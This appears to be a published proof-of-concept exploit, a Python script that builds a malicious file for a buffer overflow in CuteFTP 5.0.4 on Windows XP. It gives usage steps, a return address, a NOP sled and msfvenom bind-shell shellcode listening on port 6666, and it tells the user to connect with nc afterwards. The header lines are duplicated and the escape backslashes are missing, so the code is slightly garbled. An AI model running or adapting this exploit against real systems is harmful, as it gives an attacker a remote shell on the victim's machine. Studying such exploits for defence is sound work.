# Exploit Title: CuteFTP 5.0 - Buffer Overflow
# Author: Matteo Malvica
# Date: 2018-08-26
# Vendor homepage: www.globalscape.com
# Software: CuteFTP 5.0.4 XP - build 54.8.6.1
# Author: Matteo Malvica
# Date: 2018-08-26
# Vendor homepage: www.globalscape.com
# Software: CuteFTP 5.0.4 XP - build 54.8.6.1
# Software Link: http://installer.globalscape.com/pub/cuteftp/archive/english/cuteftp50.exe
# Tested on: Windows XP Profesional SP3 English x86
# STEPS:
# 1. The python script will generate an 'exploit.txt' file.
# 2. Start CuteFTP
# 3. In the program menu click "File" > "Site Manager" > "New" and paste the content of
# the exploit file into the 'label' field and provide a dummy IP addresss.
# 4. Right click on the site name and 'create shortcut'
# 5. Rename the shortcut to whatever name you prefer: this will create an exe that automates exploit loading upon clicking.
# 6. Quit CuteFTP and launch the newly created 'shortcut'.exe
# 7. $ nc [target_ip] 6666
# 8. celebrate moderately
ret="xD8xFCx91x7C" #ntdll.dll 7C91FCD8
nops = 'x90'*30
#msfvenom -p windows/shell_bind_tcp LPORT=6666 -b 'x0ax00x0d' -f python
sc = ""
sc += "xdbxd8xb8xa7x37x29x0exd9x74x24xf4x5bx33"
sc += "xc9xb1x53x31x43x17x83xebxfcx03xe4x24xcb"
sc += "xfbx16xa2x89x04xe6x33xeex8dx03x02x2exe9"
sc += "x40x35x9ex79x04xbax55x2fxbcx49x1bxf8xb3"
sc += "xfax96xdexfaxfbx8bx23x9dx7fxd6x77x7dx41"
sc += "x19x8ax7cx86x44x67x2cx5fx02xdaxc0xd4x5e"
sc += "xe7x6bxa6x4fx6fx88x7fx71x5ex1fx0bx28x40"
sc += "x9exd8x40xc9xb8x3dx6cx83x33xf5x1ax12x95"
sc += "xc7xe3xb9xd8xe7x11xc3x1dxcfxc9xb6x57x33"
sc += "x77xc1xacx49xa3x44x36xe9x20xfex92x0bxe4"
sc += "x99x51x07x41xedx3dx04x54x22x36x30xddxc5"
sc += "x98xb0xa5xe1x3cx98x7ex8bx65x44xd0xb4x75"
sc += "x27x8dx10xfexcaxdax28x5dx83x2fx01x5dx53"
sc += "x38x12x2ex61xe7x88xb8xc9x60x17x3fx2dx5b"
sc += "xefxafxd0x64x10xe6x16x30x40x90xbfx39x0b"
sc += "x60x3fxecxa6x68xe6x5fxd5x95x58x30x59x35"
sc += "x31x5ax56x6ax21x65xbcx03xcax98x3fx31x01"
sc += "x14xd9x2fx05x70x71xc7xe7xa7x4ax70x17x82"
sc += "xe2x16x50xc4x35x19x61xc2x11x8dxeax01xa6"
sc += "xacxecx0fx8exb9x7bxc5x5fx88x1axdax75x7a"
sc += "xbex49x12x7axc9x71x8dx2dx9ex44xc4xbbx32"
sc += "xfex7exd9xcex66xb8x59x15x5bx47x60xd8xe7"
sc += "x63x72x24xe7x2fx26xf8xbexf9x90xbex68x48"
sc += "x4ax69xc6x02x1axecx24x95x5cxf1x60x63x80"
sc += "x40xddx32xbfx6dx89xb2xb8x93x29x3cx13x10"
sc += "x59x77x39x31xf2xdexa8x03x9fxe0x07x47xa6"
sc += "x62xadx38x5dx7axc4x3dx19x3cx35x4cx32xa9"
sc += "x39xe3x33xf8"
buffer = "A" * 520+ ret + nops + sc + "C" * (3572 - len(sc))
payload = buffer
try:
f=open("exploit.txt","w")
print "[+] Creating %s recreational bytes..." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"